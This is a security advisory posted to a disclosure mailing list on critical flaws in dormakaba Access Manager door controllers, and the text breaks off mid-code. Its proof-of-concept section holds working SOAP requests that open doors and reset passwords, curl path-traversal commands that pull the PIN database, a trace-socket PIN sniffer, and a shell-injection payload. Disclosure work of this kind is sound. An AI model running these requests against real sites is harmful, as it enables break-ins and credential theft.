Message-ID: <ca7b04c0-83cc-4d45-9729-fe93623d1332@sec-consult.com>
Date: Mon, 26 Jan 2026 10:21:48 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20260126-1 :: Multiple Critical Vulnerabilities
 in dormakaba Access Manager

SEC Consult Vulnerability Lab Security Advisory < 20260126-1 >
=======================================================================
               title: Multiple Critical Vulnerabilities
             product: dormakaba Access Manager
  vulnerable version: Multiple firmware and hardware revisions (details below)
       fixed version: Multiple firmware and hardware revisions (details below)
          CVE number: CVE-2025-59097, CVE-2025-59098, CVE-2025-59099,
                      CVE-2025-59100, CVE-2025-59101, CVE-2025-59102,
                      CVE-2025-59103, CVE-2025-59104, CVE-2025-59105,
                      CVE-2025-59106, CVE-2025-59107, CVE-2025-59108
              impact: critical
            homepage: https://www.dormakaba.com/
               found: 2024-03-18
                  by: Clemens Stockenreitner (Office Vienna)
                      Werner Schober (Office Vienna)
                      Supported by the HW Lab Vienna
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"The Kaba exos 9300 basic system is the cornerstone of your access
management solution. Use it to resolve all your basic employees,
system, user and peripheral management tasks and initiate targeted
security measures as required. [...] "

Source: https://www.dormakaba.com/gb-en/offering/products/electronic-access-data/corporate-access-control-solutions/dormakaba-exos-9300-base-system--ka_500000


Business recommendation:
------------------------
The vendor provides multiple patches which should be installed immediately.
More details can be found at the following locations:
- Solution at the end of this advisory
- SEC Consult blog post: https://r.sec-consult.com/dormakaba
- Vendor website / security page: https://www.dormakabagroup.com/en/security-advisories
- Your dormakaba partner


Tested Architecture Overview
----------------------------
The tested system is the enterprise grade physical access system from
dormakaba. The tested system consists of the following components:

------------------------------
dormakaba exos 9300
------------------------------
Exos 9300 is a C# application running on a central Windows server with an MSSQL
or Oracle database as central storage.
Exos consists of multiple modules (e.g. basis, employee management, key depot, access,
visitor management, 3rd party management). Exos is used to centrally manage users,
keys, cards as well as the configuration of the access manager. Devices in the
exos environment are addressed using a proprietary addressing scheme. This scheme,
described in the following table, matters for the attacks below, because the device
address is the only value a request to an Access Manager has to carry.

┌────────────────────┬───────────────────────────┬───────────────┬───────────────────────────────────────────┬───────────────────────────┬───────────────────┐
│         I          │            01             │      00       │                    01                     │            00             │        00         │
├────────────────────┼───────────────────────────┼───────────────┼───────────────────────────────────────────┼───────────────────────────┼───────────────────┤
│ Port Type          │ Communication Hub Address │ Port Address  │ Access Hub Address                        │ 00 = Door Manager         │ Datapoint Address │
│ I = Access Manager │ Values: 01-99             │ Values: 00-99 │ Values: 00-99                             │ 01 = Access Point         │ Values: 00-20     │
│ B = Serial         │                           │               │ Fixed to 01 for Access Hubs with Ethernet │ 02 = Turnstile            │                   │
│ C = Modem          │                           │               │                                           │ 03 = IO Controller        │                   │
│ E = Ethernet       │                           │               │                                           │ Fixed to 00 in most cases │                   │
│ R = remote         │                           │               │                                           │                           │                   │
└────────────────────┴───────────────────────────┴───────────────┴───────────────────────────────────────────┴───────────────────────────┴───────────────────┘

------------------------------
dormakaba Access Manager
------------------------------
The access manager is a component that is configured via exos. The configuration
is exchanged between exos and the access manager via a SOAP interface. By default
this data exchange is unencrypted; encryption is only available starting with
access manager hardware release K7.
The access manager is a custom piece of hardware with multiple inputs and outputs.
The device offers the following interfaces:
- Digital Inputs
- 3x DC Output Relays
- 2x RS-232
- 1x RS-485 (Used to connect to access manager extension systems e.g. Kaba 9125)
- 1x RJ45
- 1x Micro USB
- 2x Coax (Used to connect registration units e.g. 9001, 9002)

The tested hardware was an access manager 9200-k5 running Windows CE embedded,
and an access manager 9200-k7 running Linux.

------------------------------
dormakaba Registration Unit
------------------------------
dormakaba registration units can be either a Legic/Mifare card reader,
or a PIN pad used to enter a PIN to deactivate alarming systems, or as
an additional authentication.

------------------------------
Electric lock
------------------------------
The lock used for the tested setup is an Assa Abloy/effeff Profix 118. The lock
is simply controlled via a relay contact connected to the Access Manager. As
soon as a user successfully authenticates with a registration unit,
the relay connected to the lock is switched and the door opens.

The system is depicted in the following diagram.

           ┌─────────┐
           │         │
           │exos 9300│              ┌──────────┐  ┌──────────┐
           │         │              │ Reg Unit │  │ Pin Pad  │
           └────┬────┘              │   ┌──┐   │  │  x x x   │
                │                   │   │┼┼│   │  │  x x x   │
Ethernet──────►│                   │   └──┘   │  │  x x x   │
                │                   │   9001   │  │   9002   │
           ┌────┴────┐              └─────┬────┘  └─────┬────┘
           │ Access  │                    │             │
           │ Manager ├────────────────────┴─────────────┘
           │  9200   │        ▲
           └────┬────┘        │
                │           Coax
                │
   DC Relay───► │
                │
             ┌──┴──┐
             │     │
             │     │
             │     │
             │    ─┤◄──────Electric Lock
             │     │
             │     │
             └─────┘



Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SOAP API (CVE-2025-59097)
The exos 9300 application can be used to configure access managers (e.g. 9200,
9230 and 9290). The configuration is done in a graphical user interface on the
dormakaba exos server. As soon as the save button is clicked in exos 9300, the
whole configuration is sent to the selected access manager via SOAP. The SOAP
request is sent without any prior authentication or authorization by default.
Though authentication and authorization can be configured using IPsec for 9200-K5
devices and mTLS for 9200-K7 devices, it is not enabled by default and must
therefore be activated with additional steps.

This insecure default allows an attacker with network-level access to take complete
control of the whole environment. Without any prior authentication, an attacker can
for example:
- Re-configure access managers (e.g. remove alarm system requirements)
- Freely re-configure the inputs and outputs
- Open all connected doors permanently
- Open all doors for a defined time interval
- Change the admin password
- and many more

Network-level access is typically obtainable due to insufficient network segmentation
and missing LAN firewalls. Some devices with an insecure configuration have also been
identified to be directly exposed to the internet.

Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: <BAME 06.00

2) Trace Functionality Leaking Sensitive Data (CVE-2025-59098)
The access manager offers a trace functionality to debug errors and issues
with the device. The trace functionality is implemented as a plain TCP socket.
A tool called TraceClient.exe, provided by dormakaba via the Access Manager web
interface, is used to connect to the socket and receive debug information. The data
is continuously broadcast to every client connected to the socket, and the socket
can be accessed without any authentication or encryption.

The amount of transmitted data depends on the configured verbosity level. The level
can be set via the HTTP(S) endpoint with the service interface password, or via the
SOAP interface with nothing more than the guessable identifier of the device.

The transmitted data contains sensitive data such as the Card ID as well as all
button presses on registration units. This allows an attacker with network-level
access to retrieve all PINs entered on a registration unit.

Vulnerable Versions:
- 92xx-K5: <XAMB 04.06.212
- 92xx-K7: <BAME 05.02.156


3) Unauthenticated Path Traversal (CVE-2025-59099)
The Access Manager uses the open source web server "CompactWebServer", written
in C#. This web server is affected by a path traversal vulnerability which
allows an attacker to read arbitrary files via simple GET requests without
prior authentication.

Hence, it is possible to retrieve all files stored on the file system, including
the SQLite database Database.sq3, which contains badge information and the corresponding
PIN codes. Additionally, requesting certain files crashes the web server, which then
stays unreachable for about 60 seconds. Repeatedly sending such a request therefore
results in a denial of service.

Vulnerable Versions:
- 92xx-K5: <XAMB 04.05.21
- 92xx-K7: <BAME 04.05.16

4) Unauthenticated Access to the SQLite Database (CVE-2025-59100)
The web interface offers a functionality to export the internal SQLite database.
After executing the export, an automatic download is started and the device
reboots. After the reboot, the exported database is deleted and can no longer be
accessed. However, it was observed that sometimes the device does not reboot, so
the export is not deleted, or that the device reboots but the export is nevertheless
left in place, for unknown reasons. The path of the database export can be accessed
without prior authentication, so an attacker may be able to download the exported
database without logging in. The database includes sensitive data like passwords,
card PINs, encrypted Mifare sitekeys and much more.

Vulnerable Versions:
- 92xx-K5: <XAMB 04.06.212

5) Insufficient Session Management (CVE-2025-59101)
Instead of typical session tokens or cookies, the server checks on a per-request
basis whether the originating IP address has previously logged in successfully. As
soon as an authentication request from a certain source IP succeeds, that IP address
is treated as authenticated; no other session state is kept. Therefore, spoofing
the IP address of a logged-in user is sufficient to gain access to the Access
Manager web interface.

Vulnerable Versions:
- 92xx-K5: <XAMB 04.06.212
- 92xx-K7: <BAME 04.07.268

6) Secrets Stored in Plaintext in Database (CVE-2025-59102)
The web server of the Access Manager offers a functionality to download a backup
of the local database stored on the device. This database contains the whole
configuration. This includes encrypted MIFARE keys, card data, user PINs and
much more. The PINs are even stored unencrypted. Combined with the fact that an
attacker can easily get access to the backup functionality by abusing the
session management issue (CVE-2025-59101), or by exploiting the weak default
password (CVE-2025-59108), or by simply setting a new password without prior
authentication via the SOAP API (CVE-2025-59097), it is easily possible to access
the sensitive data on the device.

Vulnerable Versions:
- 92xx-K5: <XAMB 04.06.212

7) Missing Transport Layer Encryption
The services provided by the access managers (the SOAP API, the Web UI and the
Trace service) are only available via unencrypted HTTP or raw TCP by default.
Depending on the hardware revision, (m)TLS can be enabled. Details can be
found in the following table.

┌────────────────────┬────────────────┬───────────────┐
│      Feature       │    9200-k5     │    9200-k7    │
├────────────────────┼────────────────┼───────────────┤
│ TLS for the Web UI │ Not Supported  │ Supported     │
│ mTLS for SOAP      │ Not Supported  │ Supported     │
│ Trace Service      │ Not Supported  │ Not Supported │
└────────────────────┴────────────────┴───────────────┘

Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: <BAME 06.00 (except Trace)

8) Weak Default Passwords for SSH Access (CVE-2025-59103)
The access manager 9200 in hardware revision K7 is based on Linux instead of
the Windows CE Embedded used in older hardware revisions. On this hardware revision
an SSH service is exposed on port 22. By analyzing the firmware of the devices, it
was noticed that there are two users with hardcoded, weak passwords that can be used
to access the devices via SSH; the passwords are also very easy to guess. The password
of at least one user is set to a random value after the first deployment, but this
randomization is gated on the configured date: it is skipped while the date is still
prior to 2022, i.e. while the device has not received a valid time. Therefore, under
certain circumstances the passwords are not randomized, for example if the clock has
never been set on the device, the battery of the clock module has been replaced, or
the Access Manager has been factory reset and has not received a time yet.

Vulnerable Versions:
- 92xx-K7: <BAME 05.01.88

9) Potential Command Injection/Argument Injection
An attacker is able to set specially crafted values as a new password to potentially
execute arbitrary commands on the Access Manager. The reason is that the new password
is concatenated into a shell command string in which the output of printf is piped
into passwd. Because the strings are simply concatenated, shell metacharacters in the
password can break out of the intended command. This opens up multiple possible
command or argument injections.

Vulnerable Versions:
- 92xx-K7: <BAME 06.00
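
Added example, not the Access Manager's firmware code (which the advisory does not
reproduce): the concatenation pattern described above, written out in Python so that
the effect of a crafted password can be inspected without executing anything, next to
an assumed hardened replacement that never involves a shell. vulnerable_command() only
builds the string; injected() tokenises it the way a POSIX shell would and reports
whether the password added further commands; printf_argument_risk() covers the
argument-injection side; safe_password_invocation() returns the argv and stdin that
set_password_safe() would hand to chpasswd. All function names, the user name 'root'
and the payload are this example's own constructions.

```python
"""Command/argument injection through a password that reaches a shell (added example)."""
import re
import shlex
import subprocess

SEPARATORS = {";", "|", "&", "&&", "||"}


def vulnerable_command(user, new_password):
    """The pattern from issue 9: the password is concatenated into a shell string
    that pipes printf output into passwd. Only returned here, never executed."""
    return f"printf '{new_password}\\n{new_password}\\n' | passwd {user}"


def shell_separators(command):
    """Tokenise like a POSIX shell (quotes honoured, ; | & split off) and return
    the command separators in order. The intended invocation has exactly one '|'."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return [tok for tok in lex if tok in SEPARATORS]


def injected(user, new_password):
    """True if the password changed the command structure (command injection)."""
    return shell_separators(vulnerable_command(user, new_password)) != ["|"]


def printf_argument_risk(new_password):
    """Even a correctly quoted password is still printf's *format* string, so
    '%' directives and backslash escapes get interpreted (argument injection)."""
    return "%" in new_password or "\\" in new_password


def safe_password_invocation(user, new_password):
    """Assumed hardened form: an argv list (no shell) plus the 'user:password'
    record chpasswd reads from stdin. Only a newline or NUL could break that
    record; chpasswd splits on the first ':' and takes the rest verbatim."""
    if not re.fullmatch(r"[a-z_][a-z0-9_-]{0,31}", user):
        raise ValueError("unexpected user name")
    if "\n" in new_password or "\0" in new_password:
        raise ValueError("newline/NUL not allowed in password")
    return ["chpasswd"], f"{user}:{new_password}\n".encode("utf-8")


def accepts(user, new_password):
    """Convenience wrapper: does the hardened path accept this password?"""
    try:
        safe_password_invocation(user, new_password)
        return True
    except ValueError:
        return False


def set_password_safe(user, new_password):
    """Runs chpasswd without a shell; needs root, so not exercised offline."""
    argv, stdin = safe_password_invocation(user, new_password)
    subprocess.run(argv, input=stdin, check=True)


if __name__ == "__main__":
    payload = "'; reboot; echo '"          # constructed injection payload
    print(vulnerable_command("root", payload))
    print("injected:", injected("root", payload))
    print(safe_password_invocation("root", payload))
```

The two checks are deliberately separate: quoting with shlex.quote() would stop the
shell breakout but leave printf interpreting the password as a format string, which is
why the hardened path avoids both the shell and printf altogether.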

10) Unlocked Bootloader (CVE-2025-59104)
With physical access to the device and enough time an attacker is able to solder
test leads to the debug footprint (or use the 6-Pin tag-connect cable). Thus,
the attacker gains access to the bootloader, where the kernel command line can
be changed. An attacker is able to gain a root shell through this vulnerability.

Vulnerable Versions:
- 92xx-K7: <BAME 06.00

11) Unencrypted Flash Storage (CVE-2025-59105)
With physical access to the device and enough time, an attacker can desolder
the flash memory, modify its contents and reinstall it, because the storage is
not encrypted. Thus, essential files such as "/etc/passwd", as well as stored
certificates, cryptographic keys, stored PINs and so on, can be read and modified,
e.g. in order to gain SSH root access on the Linux-based K7 model. On the Windows CE
based K5 model, the password for the Access Manager can additionally be read in
plain text from the stored SQLite database.

Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: <BAME 06.00

12) Web Server Running with Root Privileges (CVE-2025-59106)
The binary serving the web server, which also executes basically all actions launched
from the Web UI, runs with root privileges. This violates the principle of least
privilege: if an attacker is able to execute code on the system via one of the
other vulnerabilities, the commands directly run with the highest privileges.

Vulnerable Versions:
- 92xx-K7: <BAME 06.00

13) Static Firmware Encryption Password (CVE-2025-59107)
Dormakaba provides the software FWServiceTool to update the firmware version of
the Access Managers via the network. The firmware in some instances is provided
in an encrypted ZIP file. Within this tool, the password used to decrypt the ZIP
and extract the firmware is set statically and can be extracted. This password
was valid for multiple observed firmware versions.

Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: All versions on the market

14) Weak Default Password (CVE-2025-59108)
By default, the password for the Access Manager's web interface is set to 'admin'.
In the tested version, changing the password was not enforced.

Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: <BAME 04.07.268


Proof of concept:
-----------------
1) Unauthenticated SOAP API (CVE-2025-59097)
The exos 9300 application has a sub-module called "System Management".
By clicking on the module in exos 9300 the application d9sysdef.exe
is launched. This sub-application is used to configure the different
devices in the exos 9300 environment. After configuring a device in
the GUI, a click on the save button is necessary to push the new config
to the Access Managers. The configuration itself is pushed via a
SOAP API. The SOAP API requests are sent without any prior authentication,
or authorization. This allows an attacker to freely re-configure and
control arbitrary devices. Some exemplary actions that can be conducted
without prior authentication are:

- Releasing locks and opening doors (Permanently, Once, or in a defined timeframe)
- Deactivating input requirements (e.g. Alarming System Inputs)
- Re-configuring the Access Manager web server (Admin password, IP)
- Directly controlling relays on the Access Managers

The only thing an attacker has to know for the request is the device
identifier. As already mentioned there is a proprietary addressing scheme
in use. A sample address of an Access Manager looks as follows:

I010001

A detailed explanation of the address can be found in the following figure. It
is important to note that an attacker can easily guess those values, as the
numbers are simply counted up by one for every new Access Manager and most of
the values are fixed anyway.

┌────────────────────┬───────────────────────────┬───────────────┬───────────────────────────────────────────┐
│         I          │            01             │      00       │                    01                     │
├────────────────────┼───────────────────────────┼───────────────┼───────────────────────────────────────────┤
│ Port Type          │ Communication Hub Address │ Port Address  │ Access Hub Address                        │
│ I = Access Manager │ Values: 01-99             │ Values: 00-99 │ Values: 00-99                             │
│ B = Serial         │                           │               │ Fixed to 01 for Access Hubs with Ethernet │
│ C = Modem          │                           │               │                                           │
│ E = Ethernet       │                           │               │                                           │
│ R = remote         │                           │               │                                           │
└────────────────────┴───────────────────────────┴───────────────┴───────────────────────────────────────────┘

The API is reachable via the following URL (port 8002 in the tested setup):

http://<Access Manager IP>:8002/ICommunicationHub2IDMMService

The following examples show how to switch a relay to open a door without presenting
a valid card, or PIN as well as an unauthenticated request to change the admin
password without knowing the original one.

Example 1 - Switch Relay to Release Door
By sending the following request to an Access Manager, the "ExecutePassagewayCommand"
with value 1 is sent to the Access Manager which in our case switches relay 1.
This switches the electric lock and opens the secured door.

------Request--------
POST /ICommunicationHub2IDMMService HTTP/1.1
Content-Type: application/soap+xml; charset=utf-8; action="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService/ICommunicationHub2IdmmService/ExecutePassagewayCommand"
Host: <Access Manager IP>:8002
Content-Length: 291
Accept-Encoding: gzip, deflate
  
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
	<s:Body>
		<ExecutePassagewayCommand xmlns="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService">
			<identifier>I010001</identifier>
			<datapointId>1</datapointId>
			<command>1</command>
		</ExecutePassagewayCommand>
	</s:Body>
</s:Envelope>
----------------------

The successful response with the result 0 (Success) can be seen in the following
listing.

------Response--------
HTTP/1.1 200 OK
Server: gSOAP/2.7
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 568
Connection: close

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://schemas.microsoft.com/2003/10/Serialization/" xmlns:ns1="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService">
	<SOAP-ENV:Body>
		<ns1:ExecutePassagewayCommandResponse>
			<ns1:ExecutePassagewayCommandResult>0</ns1:ExecutePassagewayCommandResult>
		</ns1:ExecutePassagewayCommandResponse>
	</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
--------------------

Example 2 - Change Password
To change the password of an Access Manager, the following request can be sent
to the device. It is sufficient to specify the new password (parameter Id 9 in the
request below); it is set immediately, without the current password being required.

------Request--------
POST /ICommunicationHub2IDMMService HTTP/1.1
Content-Type: application/soap+xml; charset=utf-8; action="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService/ICommunicationHub2IdmmService/BinaryTimezoneUpdate"
Host: <Access Manager IP>:8002
Content-Length: 363
Accept-Encoding: gzip, deflate
  
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
	<s:Body>
		<ParameterUpdate xmlns="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService">
			<identifier>I010007</identifier>
			<parameters xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
				<Parameter>
					<Id>9</Id>
					<Value>sectest</Value>
				</Parameter>
			</parameters>
		</ParameterUpdate>
	</s:Body>
</s:Envelope>
----------------------

The successful response with the result 0 (Success) can be seen in the following
listing.

------Response--------
HTTP/1.1 200 OK
Server: gSOAP/2.7
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 532
Connection: close

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://schemas.microsoft.com/2003/10/Serialization/" xmlns:ns1="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService">
	<SOAP-ENV:Body>
		<ns1:ParameterUpdateResponse>
			<ns1:ParameterUpdateResult>0</ns1:ParameterUpdateResult>
		</ns1:ParameterUpdateResponse>
	</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
----------------------

2) Trace Functionality Leaking Sensitive Data (CVE-2025-59098)
The dormakaba Access Manager has an open port (TCP/4502) that is used for debugging
and sending trace data. The socket is normally accessed via an application (TraceTool.exe)
that can be downloaded via the Access Manager web app. The tool simply connects
to the TCP socket and displays the broadcast data. The verbosity of the transmitted
data can be tuned by setting a verbosity level.

The verbosity level is set via the already known SOAP API. The level can either be set
by supplying the known or guessable device identifier, or by sending the password, which
has the default value "admin". In the wild we noticed different trace configurations:
some Access Managers were configured with verbose trace levels, some just with informational.
After connecting to the socket with an arbitrary tool (e.g. telnet, netcat), the broadcast
data can be observed.

The data includes debug information about inputs (e.g. the entered PIN), as well as
success (correct PIN, known card) and error messages (unknown card, wrong PIN).

The following excerpt shows the output of the socket after holding a card against the card
reader and entering the PIN 1234 as well as pressing the button "Enter". It can be clearly
observed that the PIN is broadcast to the socket. Furthermore, the success messages
are displayed.

telnet <Access Manager IP> 4502
Trying <Access Manager IP>...
Connected to <Access Manager IP>.
Escape character is '^]'.
(Info)15:53:07.433: TraceSettings.TcpTracing (Port: 4502): Add new Client to Traceoutput: $ClientIP:47434
(Verbose)15:53:08.128: Found 1 txps.
(Verbose)15:53:08.161: TransponderHandling.ReadImpl: Read from current segment with offset 0 11 bytes of data
(Verbose)15:53:08.177: MediaReceive.SendForward: Added record (BadgeMessage, NoError) to mediaQueue
(Verbose)15:53:08.220: MediaReceive.HandleReceivedMedia: Processing now record (BadgeMessage, NoError)
(Verbose)15:53:08.226: ReactionStrategy.GainAdmission: Used record: CardID: 0000000000000000007A
(Verbose)15:53:08.230: +Cardlink.Execute
(Verbose)15:53:08.234: -Cardlink.Execute
(Verbose)15:53:08.240: Reaction.GetCardFromCache took 1 ms. System is offline
(Verbose)15:53:08.244: ReactionStrategy.React: GetPerson returned NoError
(Verbose)15:53:08.253: Reaction.CheckTimezone: Return EnterPincodeIdentification
(Verbose)15:53:08.257: ReactionStrategy.AdmissionReaction: CheckProfile returned EnterPincodeIdentification
(Info)15:53:08.261: Reaction.AdmissionReaction: EnterPincodeIdentification
(Verbose)15:53:08.264: ReactionStrategy.GainAdmissionInternal: AdmissionReaction returned EnterPincodeIdentification
(Verbose)15:53:08.270: React: GainAdmission returned EnterPincodeIdentification
(Verbose)15:53:08.274: React: MsgId is EnterPincodeIdentification
(Info)15:53:08.284: AntComApi.Send: Sending command AccessLedGreen, AccessLedRed, FKey
(Info)15:53:08.693: AntComApi.Send: Sending command FeedbackBuzzer, FeedbackLed, On, KeyPad
(Info)15:53:09.580: AntComApi.GetKey: Key 1 received from InternalRegistrationUnits
(Verbose)15:53:09.586: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:09.929: AntComApi.GetKey: Key 2 received from InternalRegistrationUnits
(Verbose)15:53:09.936: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:10.446: AntComApi.GetKey: Key 3 received from InternalRegistrationUnits
(Verbose)15:53:10.452: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:10.795: AntComApi.GetKey: Key 4 received from InternalRegistrationUnits
(Verbose)15:53:10.801: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:11.397: AntComApi.GetKey: Key E received from InternalRegistrationUnits
(Verbose)15:53:11.403: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Verbose)15:53:11.413: Reaction.GetCardFromCache took 1 ms. System is offline
(Info)15:53:11.418: Reaction.CheckPincode: AccessGrantedWithPincode
(Verbose)15:53:11.426: React: MsgId is AccessGrantedWithPincode
(Verbose)15:53:11.449: Reaction.GetCardFromCache took 1 ms. System is offline
(Verbose)15:53:11.457: PassagewayCommand.Execute (ReleasePassageCommand)
(Info)15:53:11.469: Passageway.SingleReleaseImmediate: SingleReleasingThisPassageway on deviceId: 2
(Verbose)15:53:11.493: Door.Release
(Info)15:53:11.509: ClearAlarm: DoorOpenAlertEnd
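
Added example (not part of the advisory, and not dormakaba's trace tool): a Python
parser that turns the trace stream into records of what an eavesdropper actually
learns, i.e. the card ID, the keys typed until Enter, the access decision and whether
the door was released. The line format and message names are taken from the excerpt
above, and the embedded sample is that excerpt trimmed to the relevant lines; the
function names and the connect helper are this example's own.

```python
"""Recover card IDs and PINs from the unauthenticated trace socket (added example)."""
import re
import socket

TRACE_PORT = 4502

LINE = re.compile(r"^\((?P<level>\w+)\)(?P<time>\d{2}:\d{2}:\d{2}\.\d{3}): (?P<msg>.*)$")
CARD = re.compile(r"CardID: (?P<id>[0-9A-Fa-f]+)")
KEY = re.compile(r"AntComApi\.GetKey: Key (?P<key>\S) received")
DECISION = re.compile(r"Reaction\.CheckPincode: (?P<result>\w+)")

# Constructed sample: the advisory's excerpt, trimmed to the lines that matter.
SAMPLE_TRACE = """\
(Info)15:53:07.433: TraceSettings.TcpTracing (Port: 4502): Add new Client to Traceoutput: $ClientIP:47434
(Verbose)15:53:08.226: ReactionStrategy.GainAdmission: Used record: CardID: 0000000000000000007A
(Info)15:53:08.261: Reaction.AdmissionReaction: EnterPincodeIdentification
(Info)15:53:09.580: AntComApi.GetKey: Key 1 received from InternalRegistrationUnits
(Verbose)15:53:09.586: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:09.929: AntComApi.GetKey: Key 2 received from InternalRegistrationUnits
(Info)15:53:10.446: AntComApi.GetKey: Key 3 received from InternalRegistrationUnits
(Info)15:53:10.795: AntComApi.GetKey: Key 4 received from InternalRegistrationUnits
(Info)15:53:11.397: AntComApi.GetKey: Key E received from InternalRegistrationUnits
(Info)15:53:11.418: Reaction.CheckPincode: AccessGrantedWithPincode
(Verbose)15:53:11.457: PassagewayCommand.Execute (ReleasePassageCommand)
"""


def _new_record(time, card_id):
    return {"time": time, "card_id": card_id, "pin": "", "decision": None, "released": False}


def parse_trace(lines):
    """One record per card presentation: card id, PIN typed (keys until 'E' = Enter),
    the CheckPincode decision and whether a release command followed. Keys typed
    without a preceding card read, or after a decision, start a record with card_id None."""
    records, current = [], None
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue                                  # not a trace line, ignore
        msg = m.group("msg")
        card = CARD.search(msg)
        key = KEY.search(msg)
        decision = DECISION.search(msg)
        if card:
            current = _new_record(m.group("time"), card.group("id"))
            records.append(current)
        elif key:
            if current is None or current["decision"] is not None:
                current = _new_record(m.group("time"), None)
                records.append(current)
            if key.group("key") != "E":               # 'E' terminates the PIN
                current["pin"] += key.group("key")
        elif decision and current is not None:
            current["decision"] = decision.group("result")
        elif "ReleasePassageCommand" in msg and current is not None:
            current["released"] = True
    return records


def connect_and_parse(host, port=TRACE_PORT, max_lines=200, timeout=10):
    """Read up to max_lines from a live device and parse them (needs network access)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("r", encoding="utf-8", errors="replace")
        lines = [f.readline() for _ in range(max_lines)]
    return parse_trace(lines)


if __name__ == "__main__":
    for rec in parse_trace(SAMPLE_TRACE.splitlines()):
        print(rec)
```

The same parser run over a long capture gives a defender a quick way to confirm
what a given trace level leaks: if any record has a non-empty pin, the verbosity
on that device is too high for an unauthenticated socket.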

3) Unauthenticated Path Traversal (CVE-2025-59099)
To exploit the path traversal vulnerability, the desired file can be placed directly
in the path of the GET request, prepended with the following string:

../../../../../../../

To download the main Kaba application running on the Access Manager, the following
request can be sent to the device without prior authentication.

curl --path-as-is http://<Access Manager IP>/../../../../../../../windows/Kaba.Idmm.Main.exe --output Kaba.Idmm.Main.exe
  
The web server then responds with the full contents of the executable.

------Response--------
HTTP/1.1 200 OK
Content-Type: application/vnd.microsoft.portable-executable
Accept-Ranges: bytes
Server: CompactWeb
Connection: close
Content-Length: 59904
Set-Cookie: authorizationID=Access accepted at xx/xx/2024 9:39:56 AM

MZÿÿ¸@€º´	Í!¸LÍ!This program cannot be run in DOS mode.
<snip>
----------------------
  
Additionally, the path traversal vulnerability can be used to gain unauthenticated
access to the SQLite database, containing badge information, corresponding PIN codes,
information about all enrolled employees and the precise device configuration parameters,
including the set admin password in cleartext.

To gain unauthenticated access to the database file, the following request can be sent
to the device.

curl --path-as-is http://<Access Manager IP>/../../../../../../../flash/Database.sq3 --output Database.sq3

The response then includes the full SQLite database.

------Response--------
HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
Server: CompactWeb
Connection: close
Content-Length: 118784
Set-Cookie: authorizationID=Access accepted at xx/xx/2024 4:04:57 PM

SQLite format 3@  $t^	,$-æØ3ûöñìçâÝØ?S-indexsqlite_autoindex_BookingEventDefs_1BookingEventDefs
‚2++„tableBinaryTimezonesBinaryTimezonesCREATE TABLE [BinaryTimezones] ( [BinaryProfileId] [int] NOT NULL, [PairPrio]
  [tinyint] NOT NULL, [TimeFrom] [smallint] NOT NULL, [TimeTo] [smallint] NOT NULL, [DayFlags] [smallint] NOT NULL, CONSTRAINT
  [PKBinaryTimezones] PRIMARY KEY (BinaryProfileId, PairPrio))=Q+indexsqlite_autoindex_BinaryTimezones_1BinaryTimezones
<snip>
----------------------

In some instances requesting certain files via the path traversal vulnerability results
in a denial of service, making the Access Manager's web interface unreachable. This can for
example be triggered by accessing the file ping.exe in the following way.

curl --path-as-is http://<Access Manager IP>/../../../../../../../windows/ping.exe
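
Added example (not CompactWebServer's code, which the advisory does not show): the
request-path-to-file mapping that makes the traversal above work, next to a contained
version, written in Python with posixpath so the check runs without a file system.
The web root /www is an assumed value; the request paths are the ones from the curl
commands above, plus a percent-encoded variant of the same payload.

```python
"""Path traversal via '..' in the request path: naive vs contained mapping (added example)."""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/www"   # assumed document root


def naive_map(url_path, root=WEB_ROOT):
    """Concatenate root and request path, then normalise. normpath happily resolves
    '..' above the root, so '/../../flash/Database.sq3' ends up outside /www."""
    return posixpath.normpath(root + "/" + unquote(url_path).lstrip("/"))


def contained_map(url_path, root=WEB_ROOT):
    """Decode, normalise, then require the result to stay under the root.
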